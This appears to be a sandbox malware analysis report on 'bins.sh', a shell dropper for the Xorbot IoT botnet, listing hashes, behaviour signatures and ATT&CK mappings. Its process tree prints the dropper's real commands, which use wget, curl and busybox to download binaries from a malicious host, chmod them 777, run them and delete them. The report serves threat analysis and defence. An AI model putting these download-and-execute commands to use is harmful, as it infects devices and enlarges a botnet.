Analysis
-
max time kernel
149s -
max time network
12s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
-
submitted
01/12/2024, 21:47
General
-
Target
bins.sh
-
Size
10KB
-
MD5
51d2a16062cf53c07946af78c250d684
-
SHA1
e98e2960f116e30e208e01cefdb4a2baaab6958b
-
SHA256
8beea9ee2f7c42432b5798c9ec2cfbb4ebe848ff58d16dd413e9dd5e05243df8
-
SHA512
f65677631c37b240bc2e9be743e7f1cdb100be6551bd41dea3c5aa5f002f76d38f177dc18d07eec5239456cb6fb06c00ba87510b3067bd6b096db403f87b48a0
-
SSDEEP
192:V+4+8+f+O+++mG6BogpeuaEsp0JXf4txZs7cYBa6GvNR16/nYG6BogguaEQB+4+h:VpB+3TzeuaEsuws8vNR16/nVuaEwpB+j
Malware Config
Signatures
-
Detects Xorbot 1 IoCs
-
Xorbot
Xorbot is a linux botnet and trojan targeting IoT devices.
-
Xorbot family
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 1 IoCs
-
Checks CPU configuration 1 TTPs 2 IoCs
Checks CPU information which indicate if the system is a virtual machine.
-
Reads runtime system information 4 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 5 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵
-
/bin/rm/bin/rm bins.sh2⤵
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/UZiTyVZkTI98ob6yjX2zUbFmw5im96BO0w2⤵
- System Network Configuration Discovery
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/UZiTyVZkTI98ob6yjX2zUbFmw5im96BO0w2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/UZiTyVZkTI98ob6yjX2zUbFmw5im96BO0w2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod 777 UZiTyVZkTI98ob6yjX2zUbFmw5im96BO0w2⤵
- File and Directory Permissions Modification
-
-
/tmp/UZiTyVZkTI98ob6yjX2zUbFmw5im96BO0w./UZiTyVZkTI98ob6yjX2zUbFmw5im96BO0w2⤵
- Executes dropped EXE
-
-
/bin/rmrm UZiTyVZkTI98ob6yjX2zUbFmw5im96BO0w2⤵
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/BFJMF6ZGI1Yc76ZQHdl9ds8OWwUZvBa6Gw2⤵
- System Network Configuration Discovery
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/BFJMF6ZGI1Yc76ZQHdl9ds8OWwUZvBa6Gw2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
112KB
MD505d7857dcead18bbd86d2935f591873c
SHA134d18f41ef35f93d5364ce3e24d74730a4e91985
SHA2562cb1fa4742268fb0196613aee7a39a08a0707b3ef8853280d5060c44f3650d70
SHA512d1793861067758a064ac1d59c80c78f9cb4b64dd680ab4a62dd050156dc0318dde590c7b44c1184c9ee926f73c3fc242662e42645faab6685ecef9d238d2e53e